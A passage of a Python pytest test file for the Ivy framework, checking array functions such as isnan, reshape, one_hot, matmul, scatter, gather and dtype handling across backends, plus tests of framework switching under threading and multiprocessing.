# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x, dtype, dev)
ret = ivy.indices_where(x)
# type test
assert ivy.is_array(ret)
# cardinality test
assert len(ret.shape) == 2
assert ret.shape[-1] == len(x.shape)
# value test
assert np.allclose(call(ivy.indices_where, x), np.asarray(ivy.functional.backends.numpy.indices_where(ivy.to_numpy(x))))
# compilation test
if not ivy.array_mode():
helpers.assert_compilable(ivy.indices_where)
# isnan
@pytest.mark.parametrize(
"x_n_res", [([True], [False]),
([[0., float('nan')], [float('nan'), 3.]],
[[False, True], [True, False]])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_isnan(x_n_res, dtype, tensor_fn, dev, call):
x, res = x_n_res
# smoke test
if isinstance(x, Number) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x, dtype, dev)
ret = ivy.isnan(x)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == x.shape
# value test
assert np.allclose(call(ivy.isnan, x), res)
# compilation test
if not ivy.array_mode():
helpers.assert_compilable(ivy.isnan)
# isinf
@pytest.mark.parametrize(
"x_n_res", [([True], [False]),
([[0., float('inf')], [float('nan'), -float('inf')]],
[[False, True], [False, True]])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_isinf(x_n_res, dtype, tensor_fn, dev, call):
x, res = x_n_res
# smoke test
if isinstance(x, Number) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x, dtype, dev)
ret = ivy.isinf(x)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == x.shape
# value test
assert np.allclose(call(ivy.isinf, x), res)
# compilation test
if not ivy.array_mode():
helpers.assert_compilable(ivy.isinf)
# isfinite
@pytest.mark.parametrize(
"x_n_res", [([True], [True]),
([[0., float('inf')], [float('nan'), 3.]],
[[True, False], [False, True]])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_isfinite(x_n_res, dtype, tensor_fn, dev, call):
x, res = x_n_res
# smoke test
if isinstance(x, Number) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x, dtype, dev)
ret = ivy.isfinite(x)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == x.shape
# value test
assert np.allclose(call(ivy.isfinite, x), res)
# compilation test
if not ivy.array_mode():
helpers.assert_compilable(ivy.isfinite)
# reshape
@pytest.mark.parametrize(
"x_n_shp", [(1., (1, 1)), (1., 1), (1., []), ([[1.]], []), ([[0., 1.], [2., 3.]], (1, 4, 1))])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_reshape(x_n_shp, dtype, tensor_fn, dev, call):
# smoke test
x, new_shape = x_n_shp
if isinstance(x, Number) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x, dtype, dev)
ret = ivy.reshape(x, new_shape)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == ((new_shape,) if isinstance(new_shape, int) else tuple(new_shape))
# value test
assert np.allclose(call(ivy.reshape, x, new_shape), np.asarray(ivy.functional.backends.numpy.reshape(ivy.to_numpy(x), new_shape)))
# compilation test
if not ivy.array_mode():
helpers.assert_compilable(ivy.reshape)
# broadcast_to
@pytest.mark.parametrize(
"x_n_shp", [([1.], (2, 1)), ([[0., 1.], [2., 3.]], (10, 2, 2))])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_broadcast_to(x_n_shp, dtype, tensor_fn, dev, call):
# smoke test
x, new_shape = x_n_shp
if isinstance(x, Number) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x, dtype, dev)
ret = ivy.broadcast_to(x, new_shape)
# type test
assert ivy.is_array(ret)
# cardinality test
assert len(ret.shape) == len(new_shape)
# value test
assert np.allclose(call(ivy.broadcast_to, x, new_shape),
np.asarray(ivy.functional.backends.numpy.broadcast_to(ivy.to_numpy(x), new_shape)))
# compilation test
if not ivy.array_mode():
helpers.assert_compilable(ivy.broadcast_to)
# squeeze
@pytest.mark.parametrize(
"x_n_axis", [(1., 0), (1., -1), ([[1.]], None), ([[[0.], [1.]], [[2.], [3.]]], -1)])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_squeeze(x_n_axis, dtype, tensor_fn, dev, call):
# smoke test
x, axis = x_n_axis
if isinstance(x, Number) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x, dtype, dev)
ret = ivy.squeeze(x, axis)
# type test
assert ivy.is_array(ret)
# cardinality test
if axis is None:
expected_shape = [item for item in x.shape if item != 1]
elif x.shape == ():
expected_shape = []
else:
expected_shape = list(x.shape)
expected_shape.pop(axis)
assert ret.shape == tuple(expected_shape)
# value test
assert np.allclose(call(ivy.squeeze, x, axis), np.asarray(ivy.functional.backends.numpy.squeeze(ivy.to_numpy(x), axis)))
# compilation test
if not ivy.array_mode():
helpers.assert_compilable(ivy.squeeze)
# zeros
@pytest.mark.parametrize(
"shape", [(), (1, 2, 3), tuple([1]*10)])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_zeros(shape, dtype, tensor_fn, dev, call):
# smoke test
ret = ivy.zeros(shape, dtype, dev)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == tuple(shape)
# value test
assert np.allclose(call(ivy.zeros, shape, dtype, dev), np.asarray(ivy.functional.backends.numpy.zeros(shape, dtype)))
# compilation test
if call in [helpers.torch_call]:
# pytorch scripting cannot assign a torch.device value with a string
return
if not ivy.array_mode():
helpers.assert_compilable(ivy.zeros)
# docstring test
helpers.assert_docstring_examples_run(ivy.zeros)
# zeros_like
@pytest.mark.parametrize(
"x", [1, [1], [[1], [2], [3]]])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_zeros_like(x, dtype, tensor_fn, dev, call):
# smoke test
if isinstance(x, Number) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x, dtype, dev)
ret = ivy.zeros_like(x, dtype, dev)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == x.shape
# value test
assert np.allclose(call(ivy.zeros_like, x, dtype, dev),
np.asarray(ivy.functional.backends.numpy.zeros_like(ivy.to_numpy(x), dtype)))
# compilation test
if call in [helpers.torch_call]:
# pytorch scripting cannot assign a torch.device value with a string
return
if not ivy.array_mode():
helpers.assert_compilable(ivy.zeros_like)
# ones
@pytest.mark.parametrize(
"shape", [(), (1, 2, 3), tuple([1]*10)])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_ones(shape, dtype, tensor_fn, dev, call):
# smoke test
ret = ivy.ones(shape, dtype, dev)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == tuple(shape)
# value test
assert np.allclose(call(ivy.ones, shape, dtype, dev), np.asarray(ivy.functional.backends.numpy.ones(shape, dtype)))
# compilation test
if call in [helpers.torch_call]:
# pytorch scripting cannot assign a torch.device value with a string
return
if not ivy.array_mode():
helpers.assert_compilable(ivy.ones)
# ones_like
@pytest.mark.parametrize(
"x", [1, [1], [[1], [2], [3]]])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_ones_like(x, dtype, tensor_fn, dev, call):
# smoke test
if isinstance(x, Number) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x, dtype, dev)
ret = ivy.ones_like(x, dtype, dev)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == x.shape
# value test
assert np.allclose(call(ivy.ones_like, x, dtype, dev),
np.asarray(ivy.functional.backends.numpy.ones_like(ivy.to_numpy(x), dtype)))
# compilation test
if call in [helpers.torch_call]:
# pytorch scripting cannot assign a torch.device value with a string
return
if not ivy.array_mode():
helpers.assert_compilable(ivy.ones_like)
# full
@pytest.mark.parametrize(
"shape", [(), (1, 2, 3), tuple([1]*10)])
@pytest.mark.parametrize(
"fill_val", [2., -7.])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_full(shape, fill_val, dtype, tensor_fn, dev, call):
# smoke test
ret = ivy.full(shape, fill_val, dtype, dev)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == tuple(shape)
# value test
assert np.allclose(call(ivy.full, shape, fill_val, dtype, dev),
np.asarray(ivy.functional.backends.numpy.full(shape, fill_val, dtype)))
# compilation test
if call in [helpers.torch_call]:
# pytorch scripting cannot assign a torch.device value with a string
return
if not ivy.array_mode():
helpers.assert_compilable(ivy.ones)
# one_hot
@pytest.mark.parametrize(
"ind_n_depth", [([0], 1), ([0, 1, 2], 3), ([[1, 3], [0, 0], [8, 4], [7, 9]], 10)])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_one_hot(ind_n_depth, dtype, tensor_fn, dev, call):
# smoke test
ind, depth = ind_n_depth
if isinstance(ind, Number) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
ind = ivy.array(ind, 'int32', dev)
ret = ivy.one_hot(ind, depth, dev)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == ind.shape + (depth,)
# value test
assert np.allclose(call(ivy.one_hot, ind, depth, dev),
np.asarray(ivy.functional.backends.numpy.one_hot(ivy.to_numpy(ind), depth)))
# compilation test
if call in [helpers.torch_call]:
# pytorch scripting cannot assign a torch.device value with a string
return
if not ivy.array_mode():
helpers.assert_compilable(ivy.one_hot)
# cross
@pytest.mark.parametrize(
"x1_n_x2", [([0., 1., 2.], [3., 4., 5.]), ([[0., 1., 2.], [2., 1., 0.]], [[3., 4., 5.], [5., 4., 3.]])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_cross(x1_n_x2, dtype, tensor_fn, dev, call):
# smoke test
x1, x2 = x1_n_x2
if (isinstance(x1, Number) or isinstance(x2, Number)) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x1 = ivy.array(x1, dtype, dev)
x2 = ivy.array(x2, dtype, dev)
ret = ivy.cross(x1, x2)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == x1.shape
# value test
assert np.allclose(call(ivy.cross, x1, x2), np.asarray(ivy.functional.backends.numpy.cross(ivy.to_numpy(x1), ivy.to_numpy(x2))))
# compilation test
if not ivy.array_mode():
helpers.assert_compilable(ivy.cross)
# matmul
@pytest.mark.parametrize(
"x1_n_x2", [([[0., 1., 2.]], [[3.], [4.], [5.]]), ([[0., 1., 2.], [2., 1., 0.]], [[3., 4.], [5., 5.], [4., 3.]])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_matmul(x1_n_x2, dtype, tensor_fn, dev, call):
# smoke test
x1, x2 = x1_n_x2
if (isinstance(x1, Number) or isinstance(x2, Number)) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x1 = ivy.array(x1, dtype, dev)
x2 = ivy.array(x2, dtype, dev)
ret = ivy.matmul(x1, x2)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == x1.shape[:-1] + (x2.shape[-1],)
# value test
assert np.allclose(call(ivy.matmul, x1, x2), np.asarray(ivy.functional.backends.numpy.matmul(ivy.to_numpy(x1), ivy.to_numpy(x2))))
# compilation test
if not ivy.array_mode():
helpers.assert_compilable(ivy.matmul)
# cumsum
@pytest.mark.parametrize(
"x_n_axis", [([[0., 1., 2.]], -1), ([[0., 1., 2.], [2., 1., 0.]], 0), ([[0., 1., 2.], [2., 1., 0.]], 1)])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_cumsum(x_n_axis, dtype, tensor_fn, dev, call):
# smoke test
x, axis = x_n_axis
x = ivy.array(x, dtype, dev)
ret = ivy.cumsum(x, axis)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == x.shape
# value test
assert np.allclose(call(ivy.cumsum, x, axis), np.asarray(ivy.functional.backends.numpy.cumsum(ivy.to_numpy(x), axis)))
# compilation test
if not ivy.array_mode():
helpers.assert_compilable(ivy.cumsum)
# cumprod
@pytest.mark.parametrize(
"x_n_axis", [([[0., 1., 2.]], -1), ([[0., 1., 2.], [2., 1., 0.]], 0), ([[0., 1., 2.], [2., 1., 0.]], 1)])
@pytest.mark.parametrize(
"exclusive", [True, False])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_cumprod(x_n_axis, exclusive, dtype, tensor_fn, dev, call):
# smoke test
x, axis = x_n_axis
x = ivy.array(x, dtype, dev)
ret = ivy.cumprod(x, axis, exclusive)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == x.shape
# value test
assert np.allclose(call(ivy.cumprod, x, axis, exclusive),
np.asarray(ivy.functional.backends.numpy.cumprod(ivy.to_numpy(x), axis, exclusive)))
# compilation test
if not ivy.array_mode():
helpers.assert_compilable(ivy.cumprod)
# identity
@pytest.mark.parametrize(
"dim_n_bs", [(3, None), (1, (2, 3)), (5, (1, 2, 3))])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_identity(dim_n_bs, dtype, tensor_fn, dev, call):
# smoke test
dim, bs = dim_n_bs
ret = ivy.identity(dim, dtype, bs, dev)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == (tuple(bs) if bs else ()) + (dim, dim)
# value test
assert np.allclose(call(ivy.identity, dim, dtype, bs, dev),
np.asarray(ivy.functional.backends.numpy.identity(dim, dtype, bs)))
# compilation test
if call in [helpers.torch_call]:
# pytorch scripting cannot assign a torch.device value with a string
return
if not ivy.array_mode():
helpers.assert_compilable(ivy.identity)
# meshgrid
@pytest.mark.parametrize(
"xs", [([1, 2, 3], [4, 5, 6]), ([1, 2, 3], [4, 5, 6, 7], [8, 9])])
@pytest.mark.parametrize(
"indexing", ['xy', 'ij'])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_meshgrid(xs, indexing, dtype, tensor_fn, dev, call):
# smoke test
xs_as_arrays = [ivy.array(x, 'int32', dev) for x in xs]
rets = ivy.meshgrid(*xs_as_arrays, indexing=indexing)
# type test
for ret in rets:
assert ivy.is_array(ret)
# cardinality test
target_shape = tuple([len(x) for x in xs])
if indexing == 'xy':
target_shape = (target_shape[1], target_shape[0]) + target_shape[2:]
for ret in rets:
assert ret.shape == target_shape
# value test
assert np.allclose(
call(ivy.meshgrid, *xs_as_arrays, indexing=indexing),
[np.asarray(i) for i in ivy.functional.backends.numpy.meshgrid(*[ivy.to_numpy(x) for x in xs_as_arrays], indexing=indexing)])
# compilation test
if call is helpers.torch_call:
# torch scripting can't take variable number of arguments or use keyword-only arguments with defaults
return
if not ivy.array_mode():
helpers.assert_compilable(ivy.meshgrid)
# scatter_flat
@pytest.mark.parametrize(
"inds_n_upd_n_size", [([0, 4, 1, 2], [1, 2, 3, 4], 8), ([0, 4, 1, 2, 0], [1, 2, 3, 4, 5], 8)])
@pytest.mark.parametrize(
"red", ['sum', 'min', 'max', 'replace'])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_scatter_flat(inds_n_upd_n_size, red, dtype, tensor_fn, dev, call):
# smoke test
if (red == 'sum' or red == 'min' or red == 'max') and call is helpers.mx_call:
# mxnet does not support sum, min or max reduction for scattering
pytest.skip()
if red == 'replace' and call is not helpers.mx_call:
# mxnet is the only backend which supports the replace reduction
pytest.skip()
inds, upd, size = inds_n_upd_n_size
inds = ivy.array(inds, 'int32', dev)
upd = tensor_fn(upd, dtype, dev)
ret = ivy.scatter_flat(inds, upd, size, red, dev)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == (size,)
if red == 'replace':
return
# value test
assert np.allclose(call(ivy.scatter_flat, inds, upd, size, red, dev),
np.asarray(ivy.functional.backends.numpy.scatter_flat(ivy.to_numpy(inds), ivy.to_numpy(upd), size, red)))
# compilation test
if call in [helpers.torch_call]:
# global torch_scatter var not supported when scripting
return
if not ivy.array_mode():
helpers.assert_compilable(ivy.scatter_flat)
# scatter_nd
@pytest.mark.parametrize(
"inds_n_upd_n_shape", [([[4], [3], [1], [7]], [9, 10, 11, 12], [8]), ([[0, 1, 2]], [1], [3, 3, 3]),
([[0], [2]], [[[5, 5, 5, 5], [6, 6, 6, 6], [7, 7, 7, 7], [8, 8, 8, 8]],
[[5, 5, 5, 5], [6, 6, 6, 6], [7, 7, 7, 7], [8, 8, 8, 8]]], [4, 4, 4])])
@pytest.mark.parametrize(
"red", ['sum', 'min', 'max', 'replace'])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_scatter_nd(inds_n_upd_n_shape, red, dtype, tensor_fn, dev, call):
# smoke test
if (red == 'sum' or red == 'min' or red == 'max') and call is helpers.mx_call:
# mxnet does not support sum, min or max reduction for scattering
pytest.skip()
if red == 'replace' and call is not helpers.mx_call:
# mxnet is the only backend which supports the replace reduction
pytest.skip()
inds, upd, shape = inds_n_upd_n_shape
inds = ivy.array(inds, 'int32', dev)
upd = tensor_fn(upd, dtype, dev)
ret = ivy.scatter_nd(inds, upd, shape, red, dev)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == tuple(shape)
if red == 'replace':
return
# value test
assert np.allclose(call(ivy.scatter_nd, inds, upd, shape, red, dev),
np.asarray(ivy.functional.backends.numpy.scatter_nd(ivy.to_numpy(inds), ivy.to_numpy(upd), shape, red)))
# compilation test
if call in [helpers.torch_call]:
# global torch_scatter var not supported when scripting
return
if not ivy.array_mode():
helpers.assert_compilable(ivy.scatter_nd)
# gather
@pytest.mark.parametrize(
"prms_n_inds_n_axis", [([9, 8, 7, 6, 5, 4, 3, 2, 1, 0], [0, 4, 7], 0),
([[1, 2], [3, 4]], [[0, 0], [1, 0]], 1)])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_gather(prms_n_inds_n_axis, dtype, tensor_fn, dev, call):
# smoke test
prms, inds, axis = prms_n_inds_n_axis
prms = tensor_fn(prms, dtype, dev)
inds = ivy.array(inds, 'int32', dev)
ret = ivy.gather(prms, inds, axis, dev)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == inds.shape
# value test
assert np.allclose(call(ivy.gather, prms, inds, axis, dev),
np.asarray(ivy.functional.backends.numpy.gather(ivy.to_numpy(prms), ivy.to_numpy(inds), axis)))
# compilation test
if call in [helpers.torch_call]:
# pytorch scripting cannot assign a torch.device value with a string
return
if not ivy.array_mode():
helpers.assert_compilable(ivy.gather)
# gather_nd
@pytest.mark.parametrize(
"prms_n_inds", [([[[0.0, 1.0], [2.0, 3.0]], [[0.1, 1.1], [2.1, 3.1]]], [[0, 1], [1, 0]]),
([[[0.0, 1.0], [2.0, 3.0]], [[0.1, 1.1], [2.1, 3.1]]], [[[0, 1]], [[1, 0]]]),
([[[0.0, 1.0], [2.0, 3.0]], [[0.1, 1.1], [2.1, 3.1]]], [[[0, 1, 0]], [[1, 0, 1]]])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_gather_nd(prms_n_inds, dtype, tensor_fn, dev, call):
# smoke test
prms, inds = prms_n_inds
prms = tensor_fn(prms, dtype, dev)
inds = ivy.array(inds, 'int32', dev)
ret = ivy.gather_nd(prms, inds, dev)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == inds.shape[:-1] + prms.shape[inds.shape[-1]:]
# value test
assert np.allclose(call(ivy.gather_nd, prms, inds, dev),
np.asarray(ivy.functional.backends.numpy.gather_nd(ivy.to_numpy(prms), ivy.to_numpy(inds))))
# compilation test
if call in [helpers.torch_call]:
# pytorch scripting cannot assign a torch.device value with a string
return
if not ivy.array_mode():
helpers.assert_compilable(ivy.gather_nd)
# linear_resample
@pytest.mark.parametrize(
"x_n_samples_n_axis_n_y_true", [([[10., 9., 8.]], 9, -1, [[10., 9.75, 9.5, 9.25, 9., 8.75, 8.5, 8.25, 8.]]),
([[[10., 9.], [8., 7.]]], 5, -2,
[[[10., 9.], [9.5, 8.5], [9., 8.], [8.5, 7.5], [8., 7.]]]),
([[[10., 9.], [8., 7.]]], 5, -1,
[[[10., 9.75, 9.5, 9.25, 9.], [8., 7.75, 7.5, 7.25, 7.]]])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_linear_resample(x_n_samples_n_axis_n_y_true, dtype, tensor_fn, dev, call):
# smoke test
x, samples, axis, y_true = x_n_samples_n_axis_n_y_true
x = tensor_fn(x, dtype, dev)
ret = ivy.linear_resample(x, samples, axis)
# type test
assert ivy.is_array(ret)
# cardinality test
x_shape = list(x.shape)
num_x_dims = len(x_shape)
axis = axis % num_x_dims
x_pre_shape = x_shape[0:axis]
num_vals = x.shape[axis]
x_post_shape = x_shape[axis+1:]
assert list(ret.shape) == x_pre_shape + [samples] + x_post_shape
# value test
y_true = np.array(y_true)
y = call(ivy.linear_resample, x, samples, axis)
assert np.allclose(y, y_true)
# compilation test
if not ivy.array_mode():
helpers.assert_compilable(ivy.linear_resample)
# exists
@pytest.mark.parametrize(
"x", [[1.], None, [[10., 9., 8.]]])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_exists(x, dtype, tensor_fn, dev, call):
# smoke test
x = tensor_fn(x, dtype, dev) if x is not None else None
ret = ivy.exists(x)
# type test
assert isinstance(ret, bool)
# value test
y_true = x is not None
assert ret == y_true
# compilation test
if not ivy.array_mode():
helpers.assert_compilable(ivy.exists)
# default
@pytest.mark.parametrize(
"x_n_dv", [([1.], [2.]), (None, [2.]), ([[10., 9., 8.]], [2.])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_default(x_n_dv, dtype, tensor_fn, dev, call):
x, dv = x_n_dv
# smoke test
x = tensor_fn(x, dtype, dev) if x is not None else None
dv = tensor_fn(dv, dtype, dev)
ret = ivy.default(x, dv)
# type test
assert ivy.is_array(ret)
# value test
y_true = ivy.to_numpy(x if x is not None else dv)
assert np.allclose(call(ivy.default, x, dv), y_true)
# compilation test
if call is helpers.torch_call:
# try-except blocks are not jit compilable in pytorch
return
if not ivy.array_mode():
helpers.assert_compilable(ivy.default)
# dtype
@pytest.mark.parametrize(
"x", [1, [], [1], [[0.0, 1.0], [2.0, 3.0]]])
@pytest.mark.parametrize(
"dtype", [None, 'float16', 'float32', 'float64', 'int8', 'int16', 'int32', 'int64', 'bool'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array])
def test_dtype(x, dtype, tensor_fn, dev, call):
# smoke test
if call in [helpers.mx_call] and dtype == 'int16':
# mxnet does not support int16
pytest.skip()
if (isinstance(x, Number) or len(x) == 0) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x, dtype, dev)
ret = ivy.dtype(x)
# type test
assert isinstance(ret, ivy.Dtype)
# dtype_to_str
@pytest.mark.parametrize(
"x", [1, [], [1], [[0.0, 1.0], [2.0, 3.0]]])
@pytest.mark.parametrize(
"dtype", ['float16', 'float32', 'float64', 'int8', 'int16', 'int32', 'int64', 'bool'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array])
def test_dtype_to_str(x, dtype, tensor_fn, dev, call):
# smoke test
if call is helpers.mx_call and dtype == 'int16':
# mxnet does not support int16
pytest.skip()
if call is helpers.jnp_call and dtype in ['int64', 'float64']:
# jax does not support int64 or float64 arrays
pytest.skip()
if (isinstance(x, Number) or len(x) == 0) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x, dtype, dev)
dtype_as_str = ivy.dtype(x, as_str=True)
dtype_to_str = ivy.dtype_to_str(ivy.dtype(x))
# type test
assert isinstance(dtype_as_str, str)
assert isinstance(dtype_to_str, str)
# value test
assert dtype_to_str == dtype_as_str
# dtype_from_str
@pytest.mark.parametrize(
"x", [1, [], [1], [[0.0, 1.0], [2.0, 3.0]]])
@pytest.mark.parametrize(
"dtype", ['float16', 'float32', 'float64', 'int8', 'int16', 'int32', 'int64', 'bool'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array])
def test_dtype_from_str(x, dtype, tensor_fn, dev, call):
# smoke test
if call is helpers.mx_call and dtype == 'int16':
# mxnet does not support int16
pytest.skip()
if call is helpers.jnp_call and dtype in ['int64', 'float64']:
# jax does not support int64 or float64 arrays
pytest.skip()
if (isinstance(x, Number) or len(x) == 0) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x, dtype, dev)
dt0 = ivy.dtype_from_str(ivy.dtype(x, as_str=True))
dt1 = ivy.dtype(x)
# value test
assert dt0 is dt1
def test_cache_fn(dev, call):
def func():
return ivy.random_uniform()
# return a single cached_fn and then query this
cached_fn = ivy.cache_fn(func)
ret0 = cached_fn()
ret0_again = cached_fn()
ret1 = func()
assert ivy.to_numpy(ret0).item() == ivy.to_numpy(ret0_again).item()
assert ivy.to_numpy(ret0).item() != ivy.to_numpy(ret1).item()
assert ret0 is ret0_again
assert ret0 is not ret1
# call ivy.cache_fn repeatedly, the new cached functions each use the same global dict
ret0 = ivy.cache_fn(func)()
ret0_again = ivy.cache_fn(func)()
ret1 = func()
assert ivy.to_numpy(ret0).item() == ivy.to_numpy(ret0_again).item()
assert ivy.to_numpy(ret0).item() != ivy.to_numpy(ret1).item()
assert ret0 is ret0_again
assert ret0 is not ret1
def test_cache_fn_with_args(dev, call):
def func(_):
return ivy.random_uniform()
# return a single cached_fn and then query this
cached_fn = ivy.cache_fn(func)
ret0 = cached_fn(0)
ret0_again = cached_fn(0)
ret1 = cached_fn(1)
assert ivy.to_numpy(ret0).item() == ivy.to_numpy(ret0_again).item()
assert ivy.to_numpy(ret0).item() != ivy.to_numpy(ret1).item()
assert ret0 is ret0_again
assert ret0 is not ret1
# call ivy.cache_fn repeatedly, the new cached functions each use the same global dict
ret0 = ivy.cache_fn(func)(0)
ret0_again = ivy.cache_fn(func)(0)
ret1 = ivy.cache_fn(func)(1)
assert ivy.to_numpy(ret0).item() == ivy.to_numpy(ret0_again).item()
assert ivy.to_numpy(ret0).item() != ivy.to_numpy(ret1).item()
assert ret0 is ret0_again
assert ret0 is not ret1
def test_framework_setting_with_threading(dev, wrapped_mode, call):
if wrapped_mode:
# ToDO: get this test passing in wrapped mode
pytest.skip()
if call is helpers.np_call:
# Numpy is the conflicting framework being tested against
pytest.skip()
def thread_fn():
ivy.set_framework('numpy')
x_ = np.array([0., 1., 2.])
for _ in range(2000):
try:
ivy.reduce_mean(x_)
except TypeError:
return False
ivy.unset_framework()
return True
# get original framework string and array
fws = ivy.current_framework_str()
x = ivy.array([0., 1., 2.])
# start numpy loop thread
thread = threading.Thread(target=thread_fn)
thread.start()
# start local original framework loop
ivy.set_framework(fws)
for _ in range(2000):
ivy.reduce_mean(x)
ivy.unset_framework()
assert not thread.join()
def test_framework_setting_with_multiprocessing(dev, call):
if call is helpers.np_call:
# Numpy is the conflicting framework being tested against
pytest.skip()
def worker_fn(out_queue):
ivy.set_framework('numpy')
x_ = np.array([0., 1., 2.])
for _ in range(1000):
try:
ivy.reduce_mean(x_)
except TypeError:
out_queue.put(False)
return
ivy.unset_framework()
out_queue.put(True)
# get original framework string and array
fws = ivy.current_framework_str()
x = ivy.array([0., 1., 2.])
# start numpy loop thread
output_queue = multiprocessing.Queue()
worker = multiprocessing.Process(target=worker_fn, args=(output_queue,))
worker.start()
# start local original framework loop
ivy.set_framework(fws)
for _ in range(1000):
ivy.reduce_mean(x)
ivy.unset_framework()
worker.join()
assert output_queue.get_nowait()
def test_explicit_ivy_framework_handles(dev, call):
if call is helpers.np_call:
# Numpy is the conflicting framework being tested against
